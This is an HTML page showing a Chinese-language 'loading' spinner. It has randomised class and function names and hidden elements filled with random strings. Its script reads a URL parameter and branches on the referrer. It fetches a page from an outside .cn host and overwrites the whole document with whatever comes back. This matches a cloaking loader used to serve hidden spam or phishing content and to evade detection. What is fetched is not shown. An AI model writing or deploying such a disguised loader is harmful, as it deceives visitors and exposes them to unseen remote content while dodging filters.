<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .dughdOe {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .dughdOe .RQ9DjuNNxlT {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .dughdOe .content {
            line-height: 50px;
            text-align: center
        }

        .dughdOe .img {
            width: 100%
        }

        .dughdOe .PKXzB7xAUI {
            text-align: center
        }

        .dughdOe .PKXzB7xAUI span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .dughdOe .PKXzB7xAUI span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .dughdOe .PKXzB7xAUI span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .dughdOe .PKXzB7xAUI span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .dughdOe .PKXzB7xAUI span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .dughdOe .PKXzB7xAUI span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .dughdOe .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function f7bkVjz809Br(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var OIRbUX = f7bkVjz809Br('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ OIRbUX +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ OIRbUX +".html?a=share";
		}
		
        DdyUNVx2Ni=url+"#"+new Date().getTime();
        DdyUNVx2Ni && function() {
            $.get(DdyUNVx2Ni, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >TSr3KgZ68u9FXrRWh2RUQUSNXE7gV4SEdZIs2UoL4WgOZ68F5D8AkjVqgPS9EVF2DSpJWnpNvNyIssjMBgqSdESb71alfnxzuzer</b>
<ul style='display:none' >H8CawRqmHNnm6HMjFFc05C1NGS0g5RgZZaipztT5QOHxIcRcNTx</ul>
<p  style='display:none'>SoRdpvwoHNvdwNRDpNZ8SoUwRY2r29Ifr38jLVA8Gobmk1YGzCKsrplKpwzlwEWUkWFv9SKT2TL7fYZna</p>
<img  src='' style='display:none'><div class="dughdOe">
    <div class="RQ9DjuNNxlT">
        <div class="PKXzB7xAUI">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>iv7LD09N8XG5bDavDuZEICOpdVQPcEJZh3iyczs</p>
<div style='display:none'>V4LAZsDwhHPL5hqcwfwTf7I9OCEEb7yhkjzVqFBxl</div>
<li style='display:none' >wZsWAEbI1ZgKm5o5OX6JK93qSMTlH3Je3FYAFOKWls0R</li></body>
</html>